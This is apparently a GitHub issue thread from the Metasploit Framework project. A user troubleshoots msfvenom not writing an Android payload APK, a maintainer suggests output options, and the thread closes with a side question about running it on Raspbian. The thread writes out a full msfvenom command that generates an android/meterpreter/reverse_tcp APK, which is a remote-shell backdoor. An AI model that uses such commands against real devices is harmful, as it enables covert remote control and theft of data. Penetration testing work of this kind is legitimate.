### ISSUE TITLE
Unable to find the Created Payload .apk file Msfvenom

### ISSUE THREAD

**Issue by Friday8229** [rapid7/metasploit-framework#14103]
The command runs like usual but the apk file is not generated.

Used command-- 
msfvenom –p android/meterpreter/reverse_tcp LHOST=(myipaddress) LPORT=LocalPort R > android_shell.apk

Output-- 

[+] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[+] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10186bytes 

After running the command ls in the root directory i am unable to find any .apk file.

**Comment by gwillcox-r7** [comment]
You can always use the -f *format* and -o *output file* options in `msfvenom`, which may help you create the output file correctly. If those still don't work, feel free to paste what you tried here and I can look into it further.

**Comment by Friday8229** [comment]
Thanks for your help but it worked out. I used this command--

msfvenom –p android/meterpreter/reverse_tcp LHOST=(myipaddress) LPORT=LocalPort R > android_shell.apk

Instead of this command--

msfvenom –p android/meterpreter/reverse_tcp LHOST=(myipaddress) LPORT=LocalPort R > /root/android_shell.apk

And it created the apk file in the home directory and this time it was visible by the "ls" command.

I'll like to know one more thing can I use Msfvenom in raspbian os??

**Comment by gwillcox-r7** [comment]
@Friday8229 In theory yes though Raspbian OS is not an officially supported platform. I assume you are mentioning Raspbian OS as you want to run Metasploit on a PI. If that is the case it is possible, though keep in mind that Metasploit has grown over the years and as a result it generally requires a decent level of processing power and memory. Assuming you can meet those requirements though it should be possible, albeit you may have to trouble shoot a few things to get it working.

**Comment by gwillcox-r7** [comment]
Closing this issue as the original issue has been resolved. @Friday8229 if you'd like to continue the Raspian OS discussion please open a separate issue and add the `Question` label. This will help others better search for answers to this question and you may get some community responses from people who are also interested in doing a similar setup.
